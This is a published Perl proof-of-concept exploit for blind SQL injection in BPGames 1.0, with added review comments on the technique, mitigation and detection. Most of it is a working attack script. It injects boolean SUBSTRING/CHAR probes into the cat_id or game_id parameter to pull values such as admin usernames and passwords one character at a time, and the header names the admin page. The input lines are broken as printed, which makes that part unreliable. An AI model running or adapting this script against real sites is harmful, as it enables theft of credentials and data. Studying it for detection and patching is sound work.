#[x]===================================================================[x]
# | AntiSecurity[dot]org |
#[x]===================================================================[x]
# | Title : BPGames 1.0 blind SQL Injection Exploit |
# | Software : BPGames |
# | Vendor : http://bpowerhouse.info |
# | Date : 22 September 2009 ( Indonesia ) |
# | Author : OoN_Boy |
# | Contact : oon.boy9@gmail.com |
# | Web : http://oonboy.info |
# | Blog : http://oonboy.blogspot.com |
#[x]===================================================================[x]
# | Technology : PHP |
# | Database : MySQL |
# | Version : 1.0 |
# | License : GNU GPL |
# | Price : $29.90 |
# | Description : is a game directory site script. The script |
# | supports multi-language settings. Site users |
# | can search for games according to categories |
#[x]===================================================================[x]
# | Google Dork : gwe ganteng :P |
#[x]===================================================================[x]
# | Exploit : http://localhost/[path]/main.php?cat_id=[sql] |
# | http://localhost/[path]/game.php?game_id=[sql]|
# | Admin Page : http://localhost/[path]/admin/index.php |
#[x]===================================================================[x]
# | Greetz : antisecurity.org batamhacker.or.id |
# | Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
# | yooogy mousekill }^-^{ martfella noname s4va |
# | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
# | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
#[x]===================================================================[x]

# What this script demonstrates (for the reader assessing exposure):
#   A boolean-based blind SQL injection proof of concept.  The cat_id /
#   game_id query parameter is appended with
#   "AND SUBSTRING((SELECT <col> FROM <tbl> LIMIT 0,1),<pos>,1)=CHAR(<n>)"
#   and the response body is searched for a marker string ($string).  Presence
#   of the marker is treated as "condition true", so the value is recovered one
#   character per matching request.  That the parameter is usable this way
#   indicates it reaches the SQL layer unparameterised — confirm against the
#   application source; the PHP side is not on this page.
#
# Mitigation: bind cat_id / game_id as a parameter (prepared statement) and
#   reject non-numeric ids before the query is built.
# Detection: many GET requests from one client to main.php / game.php whose
#   query string contains SUBSTRING( ... )=CHAR( sequences, at a steady rate
#   (this loop issues up to 36 requests per character position, see get_data).
#
# NOTE(review): no `use strict; use warnings;` — every variable below except
#   the few declared with `my` is an unqualified package global.

use HTTP::Request;
use LWP::UserAgent;

$cmsapp = 'BPGames';
$vuln = 'main.php?cat_id='; #change vuln game.php?game_id=
#vuln = 'game.php?game_id=';
$string = 'Previous'; #change if any string   (marker expected only in a "true" page)
#string = 'Instrucciones';
$maxlen = 32;        # maximum number of character positions walked per column

# Clear the terminal; the only OS-specific branch in the script.
my $OS = "$^O";
if ($OS eq 'MSWin32') {
    system("cls");
} else {
    system("clear");
}

printf "\n $cmsapp [x]=================================================[x] | BPGames 1.0 blind 
SQL Injection Exploit | [x]=================================================[x] \n";

# Interactive input.  NOTE(review): in this copy the right-hand side of each
# assignment below is empty (`chomp($web=);` etc.) — the read expression was
# evidently lost when the listing was extracted, so as printed these four
# statements will not parse.
print " [+] URL Path : ";
chomp($web=);
print " [+] Valid ID : ";
chomp($id=);
print " [+] Table : ";
chomp($table=); #table name admins
print " [+] Columns : ";
chomp($columns=); #column username and password

# Normalise the base URL: only an "http://" prefix is recognised; anything
# else is assumed to be a bare host/path and gets the scheme prepended.
if ($web =~ /http:\/\// ) {
    $target = $web."/";
} else {
    $target = "http://".$web."/";
}
print "\n\n [!] Exploiting $target ...\n\n";
# `&get_data;` (no parens) also hands the caller's current @_ to the sub;
# harmless here because get_data reads only globals.
&get_data;
print "\n\n [!] Mission completed.\n\n";

# get_data — for every comma-separated column name in $columns, recover the
# first row's value position by position and echo it to STDOUT.
# Reads globals: $columns, $table, $maxlen, $string.  Sets global $column,
# which exploit() reads.
# Per position it probes ASCII 48..57 ('0'..'9') and, only if none matched,
# 97..122 ('a'..'z'); a position where no candidate matches ends the walk for
# that column, so only values made of digits and lowercase letters are
# recovered in full.  Returns nothing meaningful; output is the side effect.
sub get_data() {
    @columns = split(/,/, $columns);
    foreach $column (@columns) {
        print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
        # syswrite bypasses STDOUT buffering so the prompt and each recovered
        # character appear immediately; 255 is the maximum byte count written.
        syswrite(STDOUT, " [-] $table\@$column> ", 255);
        for (my $i=1; $i<=$maxlen; $i++) {
            my $chr = 0;     # set once a candidate matches at this position
            my $found = 0;   # mirrors $chr; both are checked below
            my $char = 48;
            while (!$chr && $char<=57) {
                if(exploit($i,$char) =~ /$string/) {
                    $chr = 1;
                    $found = 1;
                    syswrite(STDOUT,chr($char),1);
                } else {
                    $found = 0;
                }
                $char++;
            }
            if(!$chr) {
                $char = 97;
                while(!$chr && $char<=122) {
                    if(exploit($i,$char) =~ /$string/) {
                        $chr = 1;
                        $found = 1;
                        syswrite(STDOUT,chr($char),1);
                    } else {
                        $found = 0;
                    }
                    $char++;
                }
            }
            # No candidate matched: treat as end of value (or a character
            # outside the probed ranges) and stop walking this column.
            if (!$found) {
                print "\n";
                last;
            }
        }
    }
}

# exploit($limit, $chars) — build the probe URL for one (position, byte)
# pair and return the response body.
#   $limit : 1-based character position passed to SUBSTRING
#   $chars : ASCII code compared via CHAR()
# Reads globals: $column, $table, $target, $vuln, $id.
# Spaces in the payload are sent as literal '+' characters.
sub exploit() {
    my $limit = $_[0];
    my $chars = $_[1];
    my $blind = '+AND+SUBSTRING((SELECT+'.$column.'+FROM+'.$table.'+LIMIT+0,1),'.$limit.',1)=CHAR('.$chars.')';
    my $inject = $target.$vuln.$id.$blind;
    my $content = get_content($inject);
    return $content;
}

# get_content($url) — single HTTP GET with a 5 second timeout; returns the
# response body.  Any error status (per HTTP::Response->is_error) prints the
# status line and terminates the whole script with exit, so one transient
# failure aborts the run rather than being retried.
sub get_content() {
    my $url = $_[0];
    my $req = HTTP::Request->new(GET => $url);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(5);
    my $res = $ua->request($req);
    if ($res->is_error){
        print "\n\n [!] Error, ".$res->status_line.".\n\n";
        exit;
    }
    return $res->content;
}
# Exploit End